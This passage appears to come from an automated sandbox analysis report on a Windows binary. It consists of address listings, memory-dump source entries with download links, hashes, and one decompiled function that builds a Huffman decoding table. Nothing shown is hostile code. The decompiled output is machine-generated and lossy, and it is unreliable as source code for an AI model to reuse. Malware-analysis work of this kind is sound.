                                                                    0x00407067
                                                                    0x0040706a
                                                                    0x0040706d
                                                                    0x00407070
                                                                    0x00407072
                                                                    0x00407078
                                                                    0x00407078
                                                                    0x0040707b
                                                                    0x0040707b
                                                                    0x0040707b
                                                                    0x0040707b
                                                                    0x00407084
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407089
                                                                    0x00407089
                                                                    0x0040708c
                                                                    0x0040708f
                                                                    0x00407091
                                                                    0x00407128
                                                                    0x00407128
                                                                    0x0040712b
                                                                    0x0040712d
                                                                    0x0040712e
                                                                    0x0040712f
                                                                    0x00407132
                                                                    0x00000000
                                                                    0x00407132
                                                                    0x00407097
                                                                    0x00407097
                                                                    0x0040709d
                                                                    0x0040709f
                                                                    0x004070c4
                                                                    0x004070c7
                                                                    0x004070cd
                                                                    0x004070d2
                                                                    0x004070d8
                                                                    0x004070de
                                                                    0x004070e0
                                                                    0x004070e3
                                                                    0x004070ec
                                                                    0x004070f2
                                                                    0x004070f2
                                                                    0x004070e5
                                                                    0x004070e7
                                                                    0x004070e9
                                                                    0x004070e9
                                                                    0x004070f4
                                                                    0x004070fa
                                                                    0x004070fc
                                                                    0x004070ff
                                                                    0x00407101
                                                                    0x00407107
                                                                    0x00407109
                                                                    0x0040710b
                                                                    0x0040710d
                                                                    0x0040710f
                                                                    0x00407112
                                                                    0x0040711b
                                                                    0x0040711e
                                                                    0x0040711e
                                                                    0x00407114
                                                                    0x00407114
                                                                    0x00407117
                                                                    0x00407117
                                                                    0x00407112
                                                                    0x00407109
                                                                    0x00407120
                                                                    0x00407122
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407122
                                                                    0x004070a1
                                                                    0x004070a1
                                                                    0x004070a7
                                                                    0x004070ad
                                                                    0x004070af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070b1
                                                                    0x004070b1
                                                                    0x004070b3
                                                                    0x004070b5
                                                                    0x004070bc
                                                                    0x004070bc
                                                                    0x004070be
                                                                    0x004070b7
                                                                    0x004070b7
                                                                    0x004070b9
                                                                    0x004070b9
                                                                    0x004070c0
                                                                    0x004070c2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040713a
                                                                    0x0040713a
                                                                    0x0040713d
                                                                    0x0040713f
                                                                    0x00407142
                                                                    0x00407145
                                                                    0x00407145
                                                                    0x00407145
                                                                    0x00407145
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004067f3
                                                                    0x004067d7
                                                                    0x00000000
                                                                    0x004067dd
                                                                    0x004067e0
                                                                    0x004067ea
                                                                    0x004067ed
                                                                    0x004067f0
                                                                    0x00000000
                                                                    0x004067f0
                                                                    0x004067d7
                                                                    0x004067fb
                                                                    0x004067fe
                                                                    0x00406802
                                                                    0x0040680c
                                                                    0x00406816
                                                                    0x00406819
                                                                    0x0040681f
                                                                    0x00406953
                                                                    0x00406955
                                                                    0x0040695b
                                                                    0x0040695e
                                                                    0x00406961
                                                                    0x00000000
                                                                    0x00406961
                                                                    0x00406825
                                                                    0x00406825
                                                                    0x00406826
                                                                    0x0040687e
                                                                    0x0040687e
                                                                    0x00406885
                                                                    0x0040692b
                                                                    0x0040692b
                                                                    0x00406930
                                                                    0x00406933
                                                                    0x00406938
                                                                    0x0040693b
                                                                    0x00406940
                                                                    0x00406943
                                                                    0x00406948
                                                                    0x0040694b
                                                                    0x0040694b
                                                                    0x00000000
                                                                    0x0040688b
                                                                    0x0040688b
                                                                    0x0040688b
                                                                    0x0040688b
                                                                    0x0040688f
                                                                    0x0040688f
                                                                    0x004068b1
                                                                    0x004068b4
                                                                    0x004068b6
                                                                    0x004068b9
                                                                    0x004068be
                                                                    0x00406894
                                                                    0x00406894
                                                                    0x00406899
                                                                    0x0040689b
                                                                    0x0040689d
                                                                    0x004068a2
                                                                    0x004068a8
                                                                    0x004068ad
                                                                    0x004068af
                                                                    0x004068af
                                                                    0x004068a4
                                                                    0x004068a4
                                                                    0x004068a4
                                                                    0x004068a2
                                                                    0x00000000
                                                                    0x004068c0
                                                                    0x004068ed
                                                                    0x004068f2
                                                                    0x004068f4
                                                                    0x004068f5
                                                                    0x004068f7
                                                                    0x004068f8
                                                                    0x004068f8
                                                                    0x004068f8
                                                                    0x00406920
                                                                    0x00406925
                                                                    0x00406925
                                                                    0x00000000
                                                                    0x00406925
                                                                    0x004068be
                                                                    0x00406885
                                                                    0x00406828
                                                                    0x00406828
                                                                    0x00406829
                                                                    0x00406873
                                                                    0x00000000
                                                                    0x00406873
                                                                    0x0040682b
                                                                    0x0040682c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406988
                                                                    0x00406988
                                                                    0x00406988
                                                                    0x0040698b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406968
                                                                    0x00406968
                                                                    0x0040696c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406972
                                                                    0x00406972
                                                                    0x00406975
                                                                    0x00406978
                                                                    0x0040697d
                                                                    0x0040697f
                                                                    0x00406982
                                                                    0x00406985
                                                                    0x00406985
                                                                    0x00406985
                                                                    0x0040698d
                                                                    0x0040698d
                                                                    0x00406990
                                                                    0x00406992
                                                                    0x00406997
                                                                    0x0040699a
                                                                    0x0040699c
                                                                    0x0040699f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004069a5
                                                                    0x004069a5
                                                                    0x004069a7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004069ad
                                                                    0x004069ad
                                                                    0x004069b1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004069b7
                                                                    0x004069b7
                                                                    0x004069ba
                                                                    0x004069bc
                                                                    0x00406a5a
                                                                    0x00406a5a
                                                                    0x00406a5d
                                                                    0x00406a5f
                                                                    0x00406a5f
                                                                    0x00406a62
                                                                    0x00406a65
                                                                    0x00406a67
                                                                    0x00406a69
                                                                    0x00406a6b
                                                                    0x00406a6b
                                                                    0x00406a74
                                                                    0x00406a79
                                                                    0x00406a7c
                                                                    0x00406a7f
                                                                    0x00406a82
                                                                    0x00406a85
                                                                    0x00406a85
                                                                    0x00406a85
                                                                    0x00406a88
                                                                    0x00406a8e
                                                                    0x00406a8e
                                                                    0x00406a94
                                                                    0x00406a94
                                                                    0x00406a94
                                                                    0x00000000
                                                                    0x00406a88
                                                                    0x004069c2
                                                                    0x004069c2
                                                                    0x004069c8
                                                                    0x004069cb
                                                                    0x004069cd
                                                                    0x004069f8
                                                                    0x004069fb
                                                                    0x00406a01
                                                                    0x00406a06
                                                                    0x00406a0c
                                                                    0x00406a12
                                                                    0x00406a14
                                                                    0x00406a17
                                                                    0x00406a20
                                                                    0x00406a26
                                                                    0x00406a26
                                                                    0x00406a19
                                                                    0x00406a1b
                                                                    0x00406a1d
                                                                    0x00406a1d
                                                                    0x00406a28
                                                                    0x00406a2e
                                                                    0x00406a31
                                                                    0x00406a33
                                                                    0x00406a35
                                                                    0x00406a3b
                                                                    0x00406a3d
                                                                    0x00406a3f
                                                                    0x00406a42
                                                                    0x00406a4b
                                                                    0x00406a4b
                                                                    0x00406a4d
                                                                    0x00406a44
                                                                    0x00406a44
                                                                    0x00406a47
                                                                    0x00406a47
                                                                    0x00406a4f
                                                                    0x00406a4f
                                                                    0x00406a3d
                                                                    0x00406a52
                                                                    0x00406a54
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406a54
                                                                    0x004069cf
                                                                    0x004069cf
                                                                    0x004069d5
                                                                    0x004069db
                                                                    0x004069dd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004069df
                                                                    0x004069df
                                                                    0x004069e1
                                                                    0x004069e3
                                                                    0x004069e6
                                                                    0x004069ed
                                                                    0x004069ed
                                                                    0x004069ef
                                                                    0x004069e8
                                                                    0x004069e8
                                                                    0x004069ea
                                                                    0x004069ea
                                                                    0x004069f1
                                                                    0x004069f3
                                                                    0x004069f6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406afa
                                                                    0x00406afd
                                                                    0x00406b00
                                                                    0x00406b06
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406cdd
                                                                    0x00406cdd
                                                                    0x00406cdd
                                                                    0x00406ce0
                                                                    0x00406ce3
                                                                    0x00406ce5
                                                                    0x00406ce8
                                                                    0x00406cee
                                                                    0x00406cf5
                                                                    0x00406cf7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bcb
                                                                    0x00406bcb
                                                                    0x00406bf3
                                                                    0x00406bf3
                                                                    0x00406bf3
                                                                    0x00406bf5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bd3
                                                                    0x00406bd3
                                                                    0x00406bd7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bdd
                                                                    0x00406bdd
                                                                    0x00406be0
                                                                    0x00406be3
                                                                    0x00406be6
                                                                    0x00406be8
                                                                    0x00406bea
                                                                    0x00406bed
                                                                    0x00406bf0
                                                                    0x00406bf0
                                                                    0x00406bf0
                                                                    0x00406bf7
                                                                    0x00406bf7
                                                                    0x00406bff
                                                                    0x00406c02
                                                                    0x00406c08
                                                                    0x00406c0b
                                                                    0x00406c0f
                                                                    0x00406c13
                                                                    0x00406c16
                                                                    0x00406c19
                                                                    0x00406c31
                                                                    0x00406c31
                                                                    0x00406c34
                                                                    0x00406c42
                                                                    0x00406c45
                                                                    0x00406c36
                                                                    0x00406c36
                                                                    0x00406c38
                                                                    0x00406c3f
                                                                    0x00406c3f
                                                                    0x00406c6e
                                                                    0x00406c6e
                                                                    0x00406c6e
                                                                    0x00406c71
                                                                    0x00406c73
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c4e
                                                                    0x00406c4e
                                                                    0x00406c52
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c58
                                                                    0x00406c58
                                                                    0x00406c5b
                                                                    0x00406c5e
                                                                    0x00406c61
                                                                    0x00406c63
                                                                    0x00406c65
                                                                    0x00406c68
                                                                    0x00406c6b
                                                                    0x00406c6b
                                                                    0x00406c6b
                                                                    0x00406c75
                                                                    0x00406c75
                                                                    0x00406c77
                                                                    0x00406c79
                                                                    0x00406c84
                                                                    0x00406c87
                                                                    0x00406c8a
                                                                    0x00406c8c
                                                                    0x00406c8e
                                                                    0x00406c90
                                                                    0x00406c93
                                                                    0x00406c96
                                                                    0x00406c9b
                                                                    0x00406c9e
                                                                    0x00406ca1
                                                                    0x00406ca4
                                                                    0x00406cab
                                                                    0x00406cae
                                                                    0x00406cb0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406cb6
                                                                    0x00406cb6
                                                                    0x00406cba
                                                                    0x00406ccb
                                                                    0x00406ccb
                                                                    0x00406ccb
                                                                    0x00406ccd
                                                                    0x00406ccd
                                                                    0x00406cd1
                                                                    0x00406cd1
                                                                    0x00406cd1
                                                                    0x00406cd3
                                                                    0x00406cd4
                                                                    0x00406cd7
                                                                    0x00406cd7
                                                                    0x00406cd7
                                                                    0x00406cda
                                                                    0x00000000
                                                                    0x00406cda
                                                                    0x00406cbc
                                                                    0x00406cbc
                                                                    0x00406cbf
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406cc5
                                                                    0x00406cc5
                                                                    0x00000000
                                                                    0x00406cc5
                                                                    0x00406c1b
                                                                    0x00406c1b
                                                                    0x00406c1d
                                                                    0x00406c1f
                                                                    0x00406c22
                                                                    0x00406c25
                                                                    0x00406c29
                                                                    0x00406c29
                                                                    0x00406cfd
                                                                    0x00406cfd
                                                                    0x00406d00
                                                                    0x00406d07
                                                                    0x00406d0b
                                                                    0x00406d0d
                                                                    0x00406d10
                                                                    0x00406d13
                                                                    0x00406d18
                                                                    0x00406d1b
                                                                    0x00406d1d
                                                                    0x00406d1e
                                                                    0x00406d21
                                                                    0x00406d2c
                                                                    0x00406d2f
                                                                    0x00406d46
                                                                    0x00406d4b
                                                                    0x00406d52
                                                                    0x00406d57
                                                                    0x00406d5b
                                                                    0x00406d5d
                                                                    0x00406d5d
                                                                    0x00406d5d
                                                                    0x00406d60
                                                                    0x00406d62
                                                                    0x00000000
                                                                    0x00406d68
                                                                    0x00406d68
                                                                    0x00406d6c
                                                                    0x00406d77
                                                                    0x00406d8a
                                                                    0x00406d8f
                                                                    0x00406d94
                                                                    0x00406d96
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d9c
                                                                    0x00406d9c
                                                                    0x00406d9f
                                                                    0x00406da1
                                                                    0x00406daf
                                                                    0x00406daf
                                                                    0x00406db2
                                                                    0x00406db2
                                                                    0x00406db5
                                                                    0x00406db8
                                                                    0x00406dbb
                                                                    0x00406dbe
                                                                    0x00406dc1
                                                                    0x00406dc4
                                                                    0x00000000
                                                                    0x00406dc4
                                                                    0x00406da3
                                                                    0x00406da3
                                                                    0x00406da9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406da9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407148
                                                                    0x00407148
                                                                    0x0040714e
                                                                    0x00407154
                                                                    0x00407159
                                                                    0x0040715f
                                                                    0x00407165
                                                                    0x00407167
                                                                    0x0040716a
                                                                    0x00407173
                                                                    0x00407179
                                                                    0x00407179
                                                                    0x0040716c
                                                                    0x0040716e
                                                                    0x00407170
                                                                    0x00407170
                                                                    0x0040717b
                                                                    0x0040717d
                                                                    0x00407180
                                                                    0x004071bb
                                                                    0x004071bb
                                                                    0x00000000
                                                                    0x00407182
                                                                    0x00407182
                                                                    0x00407182
                                                                    0x00407188
                                                                    0x0040718b
                                                                    0x0040718d
                                                                    0x004071c2
                                                                    0x004071c4
                                                                    0x00000000
                                                                    0x004071c4
                                                                    0x00000000
                                                                    0x0040718d
                                                                    0x00000000
                                                                    0x004067cc
                                                                    0x0040719a
                                                                    0x00000000
                                                                    0x0040719a
                                                                    0x00406bae
                                                                    0x00406bb0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406bb2
                                                                    0x00406bb2
                                                                    0x00406bb5
                                                                    0x00000000
                                                                    0x00406bb5
                                                                    0x00406afa
                                                                    0x00406abb
                                                                    0x0040719f
                                                                    0x004071a2
                                                                    0x004071a4
                                                                    0x004071ad
                                                                    0x004071b3
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.239562396.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.239554340.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239591179.0000000000408000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239609689.000000000040A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239666470.000000000041D000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239682201.000000000042C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239717893.0000000000435000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.239734563.0000000000438000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                    • Instruction ID: b08cd02f1fd501d3445e90baf7751cef13b22d715440c1b84896235b33eeb5ef
                                                                    • Opcode Fuzzy Hash: 4bf0dc9490cdbbc86d2a3ca7a16b52ea3cfbca706e4f0df3696eaa57b0731521
                                                                    • Instruction Fuzzy Hash: E3E18A71904719DFDB24CF58C890BAABBF5FB44305F15882EE497A72D1E738AA91CB04
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00407272, Relevance: .3, Instructions: 300COMMONCrypto
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00407272(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d6d0 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d6d0;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d6d0 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}











































































                                                                    0x0040727d
                                                                    0x00407285
                                                                    0x00407289
                                                                    0x0040728b
                                                                    0x0040728e
                                                                    0x00407290
                                                                    0x00407290
                                                                    0x00407292
                                                                    0x00407299
                                                                    0x0040729b
                                                                    0x0040729b
                                                                    0x004072a1
                                                                    0x004072b6
                                                                    0x004072be
                                                                    0x004072c0
                                                                    0x004072c2
                                                                    0x004072c5
                                                                    0x004072c6
                                                                    0x004072c6
                                                                    0x004072cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004072ce
                                                                    0x004072d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004072d1
                                                                    0x004072d5
                                                                    0x004072d8
                                                                    0x004072da
                                                                    0x004072da
                                                                    0x004072dd
                                                                    0x004072e3
                                                                    0x004072e4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004072e4
                                                                    0x004072e9
                                                                    0x004072ec
                                                                    0x004072ee
                                                                    0x004072ee
                                                                    0x004072f4
                                                                    0x004072f6
                                                                    0x00407307
                                                                    0x004072fa
                                                                    0x004072fe
                                                                    0x004075a3
                                                                    0x00000000
                                                                    0x004075a3
                                                                    0x00407304
                                                                    0x00407305
                                                                    0x00407305
                                                                    0x0040730d
                                                                    0x00407310
                                                                    0x00407314
                                                                    0x00407316
                                                                    0x00407318
                                                                    0x0040731b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407323
                                                                    0x00407329
                                                                    0x0040732b
                                                                    0x0040732d
                                                                    0x0040732e
                                                                    0x00407343
                                                                    0x00407343
                                                                    0x00407346
                                                                    0x00407348
                                                                    0x00407348
                                                                    0x0040734a
                                                                    0x0040734f
                                                                    0x00407351
                                                                    0x00407358
                                                                    0x0040735a
                                                                    0x00407362
                                                                    0x00407362
                                                                    0x00407364
                                                                    0x00407365
                                                                    0x00407374
                                                                    0x00407378
                                                                    0x0040737c
                                                                    0x0040737f
                                                                    0x00407382
                                                                    0x00407387
                                                                    0x0040738a
                                                                    0x00407390
                                                                    0x00407397
                                                                    0x0040739d
                                                                    0x00407596
                                                                    0x00407596
                                                                    0x0040759b
                                                                    0x004075aa
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040759b
                                                                    0x004073aa
                                                                    0x004073ad
                                                                    0x004073b0
                                                                    0x004073b3
                                                                    0x004073b7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004073c2
                                                                    0x004073c5
                                                                    0x004073c6
                                                                    0x004073c8
                                                                    0x004073ce
                                                                    0x004073d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004073d7
                                                                    0x004073d8
                                                                    0x004073db
                                                                    0x004073de
                                                                    0x004073e1
                                                                    0x004073e7
                                                                    0x004073e9
                                                                    0x004073e9
                                                                    0x004073f1
                                                                    0x004073f5
                                                                    0x004073fa
                                                                    0x0040741f
                                                                    0x00407425
                                                                    0x00407427
                                                                    0x00407429
                                                                    0x0040742c
                                                                    0x00407435
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004073fc
                                                                    0x004073fc
                                                                    0x00407405
                                                                    0x00407409
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040741a
                                                                    0x0040741a
                                                                    0x0040741d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040740d
                                                                    0x00407410
                                                                    0x00407412
                                                                    0x00407416
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407418
                                                                    0x00407418
                                                                    0x00000000
                                                                    0x0040741a
                                                                    0x0040743e
                                                                    0x00407444
                                                                    0x0040744e
                                                                    0x00407450
                                                                    0x00407455
                                                                    0x00407457
                                                                    0x0040748d
                                                                    0x00407459
                                                                    0x00407459
                                                                    0x0040745c
                                                                    0x0040745f
                                                                    0x00407469
                                                                    0x0040746c
                                                                    0x00407473
                                                                    0x0040747e
                                                                    0x00407485
                                                                    0x00407485
                                                                    0x0040748f
                                                                    0x00407492
                                                                    0x00407494
                                                                    0x0040749a
                                                                    0x0040749a
                                                                    0x004074a3
                                                                    0x004074a6
                                                                    0x004074ab
                                                                    0x004074ba
                                                                    0x004074c2
                                                                    0x004074c7
                                                                    0x004074eb
                                                                    0x004074f3
                                                                    0x004074f7
                                                                    0x004074fd
                                                                    0x004074c9
                                                                    0x004074d7
                                                                    0x004074da
                                                                    0x004074e0
                                                                    0x004074e0
                                                                    0x00407501
                                                                    0x004074bc
                                                                    0x004074bc
                                                                    0x004074bc
                                                                    0x00407512
                                                                    0x00407516
                                                                    0x00407522
                                                                    0x0040751d
                                                                    0x00407520
                                                                    0x00407520
                                                                    0x0040752a
                                                                    0x0040752f
                                                                    0x00407537
                                                                    0x00407533
                                                                    0x00407535
                                                                    0x00407535
                                                                    0x0040753d
                                                                    0x0040753f
                                                                    0x00407546
                                                                    0x00407550
                                                                    0x0040755a
                                                                    0x00407576
                                                                    0x0040757a
                                                                    0x004073bf
                                                                    0x004073c5
                                                                    0x004073c6
                                                                    0x004073c8
                                                                    0x004073ce
                                                                    0x004073d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004073d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040755c
                                                                    0x0040755c
                                                                    0x0040755c
                                                                    0x00407561
                                                                    0x0040756a
                                                                    0x00407573
                                                                    0x00000000
